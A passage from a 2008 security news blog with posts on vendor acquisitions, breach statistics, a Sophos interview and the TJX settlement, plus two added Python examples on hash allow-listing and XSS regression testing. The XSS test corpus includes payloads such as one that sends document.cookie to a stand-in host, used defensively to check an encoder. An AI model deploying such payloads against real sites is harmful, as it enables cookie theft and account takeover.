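decision made with a hash deny-list (blacklist) and with a default-deny
allow-list (whitelist). All binaries below are constructed byte strings.
"""
import hashlib


def fingerprint(binary: bytes) -> str:
    """SHA-256 of the file contents, the usual key for both kinds of list."""
    return hashlib.sha256(binary).hexdigest()


# Constructed samples standing in for executables found on an endpoint.
APPROVED = {
    "notepad.exe": b"MZ\x90\x00 constructed sample: notepad",
    "payroll.exe": b"MZ\x90\x00 constructed sample: payroll v1",
}
KNOWN_BAD = b"MZ\x90\x00 constructed sample: trojan v1"
# A repack of the same trojan: one appended byte means a new hash and no signature yet.
REPACKED_BAD = KNOWN_BAD + b"\x00"
# A legitimate update that nobody has added to the allow-list yet.
PAYROLL_V2 = b"MZ\x90\x00 constructed sample: payroll v2"

DENY_LIST = {fingerprint(KNOWN_BAD)}
ALLOW_LIST = {fingerprint(binary) for binary in APPROVED.values()}


def deny_list_decision(binary: bytes) -> str:
    """Signature-style blacklisting: anything not already known bad may run."""
    return "block" if fingerprint(binary) in DENY_LIST else "allow"


def allow_list_decision(binary: bytes) -> str:
    """Default deny: only hashes that were explicitly approved may run."""
    return "allow" if fingerprint(binary) in ALLOW_LIST else "block"


def decide(binary: bytes) -> dict:
    """Both verdicts side by side for a single file."""
    return {
        "deny_list": deny_list_decision(binary),
        "allow_list": allow_list_decision(binary),
    }


if __name__ == "__main__":
    for label, sample in [("known trojan", KNOWN_BAD), ("repacked trojan", REPACKED_BAD),
                          ("approved notepad", APPROVED["notepad.exe"]),
                          ("unapproved payroll update", PAYROLL_V2)]:
        print(f"{label:28s} {decide(sample)}")
```

The two interesting rows are the repacked trojan, which the deny-list waves through because its hash is new, and the unapproved payroll update, which the allow-list blocks until someone approves it. The first is the failure mode the post describes; the second is the operational cost that comes with default deny, and it is why whitelisting shifts the work from chasing malware to keeping the approved set current.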


April 11, 2008
Security Must Become a Business Enabler

In a keynote speech that Art Coviello gave at the RSA Conference this past week, the EMC Executive Vice President and RSA Security Division President said, "We need to turn a longstanding stereotype of information security on its head and show how information-centric security can be an accelerator—and not an inhibitor—of business innovation and growth."

Almost everywhere you look, data security needs to work in lockstep with information management. Said Coviello, "Just look at the continued pace of security acquisitions by infrastructure companies and the integration of acquired technologies across all parts of the infrastructure."

But on the flip side, it's clear that many companies still see security as a necessary evil, or even a disabler. According to Coviello, more than 80 percent of IT, security and business executives surveyed admit that their organizations have shied away from business innovation opportunities because of information security concerns.

"This is what they said: 'Typically in most global organizations security is viewed at best as a necessary evil and more commonly as a necessary friction. This derives from security's primary focus on attempting to constrain behavior to prevent negative events. Although well-intentioned, the inevitable result is that security practitioners are not viewed as enablers but people preventing the business from doing what it needs to do.'"

And to change security from an innovation stopper into an enabler, instead of drilling into the security shortcomings of every new idea, you have to start looking at things in terms of risk. It's just a change of mind, really, and hey, we security folks change our mind all the time. I mean, no we don't.


April 10, 2008
IBM Deepens Their Data Protection

It's like watching a game of 3D chess as these big companies head out on security shopping sprees almost as soon as they identify a security need in the marketplace or a weakness in their portfolio. But the results remain on trend: big companies keep picking up specialty security companies so that they can continue to be the one-stop security shop, the one place to go for all your security needs.

In fact, I did a podcast with IBM late last year about their goal of an end-to-end security solution which you can listen to right here.

IBM announced an agreement to buy FilesX, a privately held storage software company based in Newton, Mass., and Haifa, Israel, that specializes in continuous data protection and near-instant data and application recovery software for enterprises and remote/branch offices. The acquisition is expected to close soon, and the financial terms were not reported. And, as if it's any surprise, FilesX will become part of the Tivoli Storage Manager product line.

“The FilesX acquisition would complement IBM’s vision of enterprise data protection by adding critical capabilities for remote offices, delivering continuous data protection for applications and servers, and supporting business user needs with nearly instantaneous recovery of data,” said Al Zollar, general manager, Tivoli software, IBM. “It would also reinforce IBM’s mid-market strategy by adding a simple and easy to use full data protection solution – one that also is attractive to enterprise remote offices and departmental situations.”

So the data protection, compliance and governance market remains HOT HOT HOT!


If you're interested in the secure B2B identity architecture of tomorrow, make sure you sign up for the Federation and User Centric Identity webinar today!


April 09, 2008
How Does Google Do Security?

With the biggest online presence of pretty much any company anywhere (I just read somewhere that Google's search share is at its highest ever), and with a well-honed sense of reputation management -- does anyone remember the day when you first started using Google and thought, Damn, how did they find that Michael Bolton bio so fast -- Google clearly has the most to lose if word suddenly got out that all those emails in Gmail and spreadsheets in Google Docs weren't being properly secured.

So what's Google's security culture like? According to Search Security, if you can't code, you can't do security at Google (let's hope that if you're lousy at security you can't do security at Google as well).

"Google has a decidedly go-at-it-alone conventional approach to solving problems," security director Scott Petry said Tuesday during an interview at RSA Conference 2008. "This is most evident in the value of security inside engineering."

In essence, Google has integrated security throughout its development lifecycle. Nooglers (Google's name for new employees) have to attend multi-day security training seminars before they're even assigned to a team or project. At the seminars the Nooglers learn everything from policy to process development to code hacking.

And before a project goes live, the production code has to pass peer review by Google's security teams along with any member of the engineering community. "No one person is authorized to write code into production," Petry said. And that's just from the inside.

In terms of outside attacks, Google keeps a database of attacks against the company, which is then run against any future Google code: every attack that ever got through becomes a regression test that new code has to pass. The idea is that, instead of looking at an attack as something only criminals do, Google treats every attack as a lesson to be learned.
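The article doesn't say what Google's attack database or tooling looks like, so what follows is my own added example of the pattern, not Google's code: a small corpus of cross-site scripting inputs that once "got through" is kept as test data, and every build's output encoder has to render all of them as inert text. The payloads, the two renderers and the inertness check are all constructed here for illustration.

```python
"""
Added example (not Google's code): keep every attack input that has ever been
seen as a regression corpus and run each build's output encoder over it. The
payloads, the renderers and the check below are constructed for illustration.
"""
from html import escape
from html.parser import HTMLParser

# Constructed corpus: inputs that once slipped through as cross-site scripting.
ATTACK_CORPUS = [
    "<script>alert(1)</script>",
    '"><img src=x onerror=alert(1)>',
    "<svg/onload=alert(1)>",
    "</p><script>document.location='http://evil.example/'+document.cookie</script>",
]


def render_comment_naive(user_text: str) -> str:
    """The 'before' version: user text interpolated straight into the page."""
    return f"<p class=comment>{user_text}</p>"


def render_comment(user_text: str) -> str:
    """The hardened version: entity-encode before interpolation."""
    return f"<p class=comment>{escape(user_text, quote=True)}</p>"


class _TagCollector(HTMLParser):
    """Records every tag, and every on* event-handler attribute, a browser would see."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.lower().startswith("on"))

    handle_startendtag = handle_starttag


def is_inert(rendered: str) -> bool:
    """True if the fragment contains only the one <p> wrapper and no event handlers."""
    collector = _TagCollector()
    collector.feed(rendered)
    collector.close()
    return collector.tags == ["p"] and not collector.handlers


def regress(render) -> list[str]:
    """Run the whole corpus through a renderer; return the payloads that still yield markup."""
    return [payload for payload in ATTACK_CORPUS if not is_inert(render(payload))]


if __name__ == "__main__":
    print("naive renderer still fails on:", regress(render_comment_naive))
    print("hardened renderer fails on:", regress(render_comment))
```

The check deliberately parses the rendered output rather than string-matching the payload, so a future encoder that merely mangles one payload's spelling still fails the test if the browser would see a tag. New attacks get appended to the corpus as they are found; nothing is ever removed, which is what turns a list of past incidents into a lesson the code keeps learning.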

This pretty much squares with what's becoming standard operating procedure when developing web applications (or at least should be): think about security early and think about it often. And if you do that, then maybe you too can be a Moogle (that's my term for an old person at Google, you know, someone about to be put out to pasture).


April 08, 2008
Cisco and RSA Partner to Protect Data

While this falls pretty much in line with Bruce Schneier's prediction in this podcast (he predicted the security industry would continue to consolidate, although he meant more along the lines of non-security companies integrating security into their applications so that security would no longer be a stand-alone product), you can still see the Cisco and RSA partnership as part of the bigger consolidation trend.

In what Cisco says is an attempt to address a very fragmented data security market, RSA, the security division of EMC, announced it will integrate its next-generation data loss prevention (DLP) products with Cisco's in order to give customers the ability to discover, secure, track and enforce the usage of sensitive data stored in the data center and on desktop and server endpoints, as well as while that data is transmitted across enterprise networks.

The two companies will continue to collaborate on data center security, data encryption and key management, and will also expand their PCI reference architecture, which helps customers audit and report on their systems to demonstrate compliance with PCI requirements.

"Data security is very challenging. Due to regulatory and non-regulatory drivers, customers need to secure sensitive data and gain stronger visibility into where that data resides. The answer lies in coordinated product innovation, strategic partnership and professional services,” said Dennis Hoffman, Vice President and General Manager for Data Security and Chief Strategy Officer at RSA, the Security Division of EMC. “By working with industry leaders, like Cisco, we are helping our customers solve these challenges. By developing solutions with Cisco, customers can discover, monitor, and enforce the use of sensitive data directly into the infrastructure – no matter where it moves, how it moves or where it is stored."

Since security complexity is such a big issue, when it comes to something as important as data security, it makes sense for two companies as big as Cisco and RSA to join forces to offer a comprehensive data protection solution.


April 07, 2008
Crimeware as a Disservice

Some interesting news came over the wire today, the first item being Finjan's findings on the rise of crimeware-as-a-service. I guess it's not too surprising, really, seeing that we have security-as-a-service, and with any technological advancement for good there will also be a technological advancement for bad. Check out the press release yourself right here.

That's really just more confirmation that cybercriminals are getting more and more organized. And as I live in NYC, I'm glad that's not necessarily true of crime on the street (although NYC is pretty darn safe nowadays); I'm real glad I don't have to worry about being stuck up by remote-controlled robots or anything.

The other bit of news I found quite interesting is the report from Quocirca, the European information technology analysis group (which you can read right here), which found that outsourced code is more likely to be hacked (and with 90 percent of companies outsourcing code, that could be a real problem).

And as outsourcing isn't going to go away anytime soon, the one thing companies should be doing but aren't is insisting that security be built right into the product.


April 04, 2008
Data Breaches Grow Bigger and Badder

According to Brian Krebs' Security Fix, the number of personal and financial records leaked, spilled, or stolen so far this year totals...8.3 million records.

This number comes from the San Diego-based Identity Theft Resource Center; the 8.3 million records came from a total of 167 breaches, which compares with 448 breaches in all of 2007.

Some somewhat good news is that more than half of the total came from a single incident, the Hannaford Bros. intrusion, which alone accounted for 4.2 million records. Businesses were responsible for 36% of the data leakage, schools 25%, government and military 18%, medical/healthcare 14%, banking and financial 7%, and your parents make up the rest (just kidding about your parents).

Most telling, though, is that only 13% of the breaches were the result of hackers gaining access, while the great majority came from lost or stolen laptops, memory sticks, or hard drives, with insider abuse and human error cited as the next most common causes.

Said Linda Foley, founder of the ID Theft Resource Center: "The question of why we are hearing more about data breaches is going to take us a couple of more years to sort out. I think, perhaps in addition to the state [disclosure laws], companies are urged on a bit by the fear of the media taking the story and releasing it rather than the companies themselves getting a chance to spin the news."

Let's just hope it's one or two people's records that just keep getting stolen over and over again. Wonder what the max limit on that credit card is?


April 02, 2008
The Rapidly Changing World of Security: A Talk With Sophos

***Editor's Note: Get up-to-speed on the strengths and weaknesses of today's identity architecture and the tools you'll need to secure identity and access for tomorrow by signing up for this webinar.

Listen to or download the 11:06 minute podcast below:



Download file

What follows is a transcript of my discussion with John Shaw, Director of Endpoint Security and Control at Sophos. John drives the inception, development, and launch of new products at Sophos, and together we discuss the current vulnerabilities, what's wrong with most security products today, what John thinks about Microsoft Vista, his take on Bruce Schneier's comment that standalone security will one day cease to exist, and much, much more.

What security threats do companies need to be most concerned with today?

So there's obviously a whole range of threats out there. I think that whenever we talk to businesses and hear what they're most concerned about, the traditional issues of viruses, worms, and so on are still very much front of mind. Increasingly, of course, there are issues such as data leakage and, more generally, control over the kind of use that's being made of corporate assets and where data is going; those are clearly very hot topics as well.

When it comes to the nature of the threat, we're seeing a couple of key changes going on. One is that the Web has a big part to play in a huge proportion of the threats we're seeing these days, spyware in particular, both in the way that people get infected and in the way that information gets stolen back out of an organization.

And the other factor that we're really seeing is that because threats are very commercially driven these days, they're much harder to detect, they're much more under the radar, they're much more targeted. And what this means is that the traditional methods of signature-based antivirus are no longer enough to protect against those kinds of threats. It's no longer enough to wait until one company has been infected and then produce a signature to protect everyone else.

What is Sophos doing exactly to address these threats?

So something we've been doing for the last couple of years now, around the nature of these targeted, rapidly changing threats, is much more in terms of proactive protection. So we've moved beyond signature-based protection. Signature-based is still very much at the heart of what we do, but we've been doing much more in terms of behavioral-based detection, so you're able to detect and stop new threats before they've been seen by anyone, before a signature has been produced, and we're stopping around 80% of the new pieces of adware, spyware, viruses and so on that we see coming out. Around 80% are being stopped by our proactive technology, if you like, today.

And then the recent announcement is really about us going even further than that. Where we see the biggest hole now in people's defenses is actually around being confident that that kind of proactive software, antivirus software, is actually running on each of your computers and that the computers are properly patched and so on. So these days what we're offering customers -- what we've just announced -- is the ability to do what we're calling "preventive protection".

So this is about, rather like preventive health, making sure that computers on a company's network are properly protected, are running up-to-date software, are running the right patches, are running the right service packs and so on, so that when a threat targets them, a business can be confident that the computer is actually going to be protected.

Gotcha. Now, what do you think is wrong with most companies' security solutions today?

Well, I think that -- really, that last issue I was talking about is probably the biggest concern, you know. When we look at why it is that businesses continue to have an issue with being infected with malware, with having data stolen from their networks, it's often because it's very hard for an IT manager these days to be confident that the computers on the network are running the right software and are up to date; so that's about two things.

One, it's about that pesky problem of the end user and the end user changing stuff. So, you know, it's hard for an IT admin to keep control of the way their computers are set up and configured, as end users inevitably want to fiddle with things and change things. And the other challenge that's there is really around the management solution for security products and the visibility it provides. It's very hard actually to have a tool that is simple to use and simple in showing you the state of protection on your computers, how compliant your computers are. So those are probably the big challenges that we see businesses facing today in terms of their current security solutions.

Now, I saw with your announcement -- tell me, what exactly is the advantage of integrating NAC with Endpoint Security Protection?

So, yeah, as you say, what we've done is integrate NAC, or network access control type technologies. And the advantage of doing that is that, as well as doing the job of protecting each computer, we're looking at the network as a whole and ensuring that every computer on the network is healthy and protected.

Now, why does it need to be done, you know, by the same solution? It really comes down to a couple of things. One is the issue of agent pollution. What we find is that IT managers really don't want to keep putting yet more and more bits of software onto their computers; it creates a headache in terms of management, it slows computers down, and it can be very invasive. So agent pollution is one issue; they really don't want to go to yet another vendor and put yet another agent on every computer in order to ensure that computers are healthy.

And the other piece is around management. Again, as you know, particularly in the current economic climate, IT teams' budgets are not getting any bigger; they're probably being asked to do more stuff but with a budget that isn't rising. And there's such demand on IT managers' time that they really don't want to be learning new, complex management tools. So the approach we've taken is to say it's a single deployment.

We don't ask you to do any sort of separate agent deployment onto the computer; it's part of the job of doing antivirus that we're already doing, and we're letting you manage this stuff through the same management toolset that our customers are already using to manage antivirus and endpoint security.

A while ago, there was some disagreement between security companies over Microsoft Vista. What's your opinion on Vista today?

Well, you know, I view Vista as definitely an advance from Microsoft in terms of the security of the operating system, so it is a more secure operating system than Windows XP, and that is absolutely a positive development. I think there has been some debate among some of our competitors about Microsoft shutting security vendors out of Vista in some way, because part of the locking down that Microsoft has done has made it hard for some security software to run.

We actually felt, even at the time, that Microsoft had done the right thing, that it was, you know, a better net benefit to the customer that the operating system is more secure and that it really was up to security vendors to make their software work in the right way. We've also seen from Microsoft with Vista Service Pack 1 some good developments in terms of opening up, in a properly secure way, more interfaces for third-party security vendors. So, basically, what we think is that Vista is, from a security perspective at least, much [0:06:51] the right things with Vista.

Gotcha. Now, security guru Bruce Schneier believes that at some point security will no longer be a separate solution but will be coupled with whatever application or service you're using. What's your take on that?

Well, again, I think, as always, the truth is somewhere in between. It's certainly the case that there is a trend towards, for example, vendors such as Microsoft putting more emphasis on security and putting more security features into their products, and that can only be a good thing. So, you know, taking Vista as an example, yes, Vista is more secure, but is it the case that you no longer need to run security software on it? Of course not.

So there's still clearly a job to be done for a vendor that's coming in with expertise around the threat space, the kind of threats that are out there, to give you the extra sort of confidence that you're protected against malware, viruses, worms, Trojans, etc. etc. etc. in case of airspace. And I think it's unlikely that in most cases customers are ever going to get to a point where they're going to rely purely on the original vendor for security and not look at any security solution on top of that; particularly when you look at it actively, you know, these days a security solution needs to look right across the network, not just at one particular vendor's piece.

So the reality is that very few of our customers are just running the latest Windows operating system; for example, they're running older Windows, they're running Macs, they're running UNIX, they're running Linux, they're running OpenVMS even. So there's a whole range of operating systems out there. So there's clearly a role to be played by someone who's looking at things from a security perspective and providing a complete security solution on top of the security that's in each product.

That makes a lot of sense to me, actually. So now, what do you see for the future of security, both in terms of threats and where the industry is going?

That's a great question. In terms of threats, unfortunately, we see that the number and type of threats out there is just continuing to expand. So the reality is these days that threats are largely very commercially motivated: there's money to be made out of stealing information, there's money to be made out of blasting out information such as, you know, spam that's then got some kind of sale attached to it, so there's a lot of money to be made out of the kind of threats that are out there.

And where there's money to be made, there will be innovation. There will continue to be innovation. So as I mentioned at the beginning, the Web is playing a large part in threats these days. We're beginning to see things, for example, using things like USB keys; we're beginning to see occasionally things now targeting Macs, whereas originally it had always been entirely targeted at Windows.

So as technology adapts, as new technologies come in, the malware authors will continue to find innovative ways of using those new technologies and they will continue to find ways of bypassing the defenses that are in place. So I'm afraid it's bad news from that point of view, I think. How does the industry need to handle that? Well, we think it's absolutely crucial that the vendors in this space take a holistic view of the threats rather than trying to pick, you know, viruses as an area of specialty or spam as an area of specialty.

So it's absolutely vital to look at the range of threats as a whole so that you're not blindsided as malware authors start to use new techniques. And I think the other piece is that what we really owe to our customers is to give them solutions that are simple and don't start reintroducing these problems of agent pollution. So we can't keep coming up with new point solutions and trying to extract more money out of customers for solving the new types of threats that come out there; that's not a reasonable thing to ask of IT managers.

So the industry needs to get its act together, and that's certainly what we're doing in terms of providing a simple-to-use solution that doesn't pollute computers with lots of different agents and that does provide complete protection against all the different kinds of unwanted stuff that's out there.


April 01, 2008
TJX Gets Slap on the Wrist

Anyone waiting for the official penalty for TJX's lax and often egregious disregard for customer data need wait no longer. I'm sure you all know the story by now of the massive data breach at TJ Maxx (which is owned by TJX), but if you need to catch up quick, just click here.

According to Network World, in a settlement with the FTC, the company will be required to implement an extensive security program as well as obtain audits by independent third parties every other year for 20 years (that's an audit every other year, not implementing security programs every other year).

The FTC found TJX failed to take reasonable and appropriate security measures to protect a wealth of personal data against unauthorized access. The specific charges against TJX, as listed by Network World, were as follows:

* Created an unnecessary risk to personal information by storing it on, and transmitting it between and within, its various computer networks in clear text;

* Did not use readily available security measures to limit wireless access to its networks, thereby allowing an intruder to connect wirelessly to its networks without authorization;

* Did not require network administrators and others to use strong passwords or to use different passwords to access different programs, computers, and networks;

* Failed to use readily available security measures, such as firewalls, to limit access among its computers and the Internet; and

* Failed to employ sufficient measures to detect and prevent unauthorized access to computer networks or to conduct security investigations, such as patching or updating anti-virus software.

Going forward, TJX pretty much has to do what any sane and sensible consumer-oriented company should be doing already anyway. Makes you wonder what TJX plans to do once the 20 years are up. Maybe start selling your personal information in store...you know, get a free working credit card number with the purchase of 3 pairs of dress socks!

But things aren't totally finished, as the credit card companies still have a lawsuit against TJX which has yet to be settled. And that'll hit TJX where it hurts most -- right in the wallet.
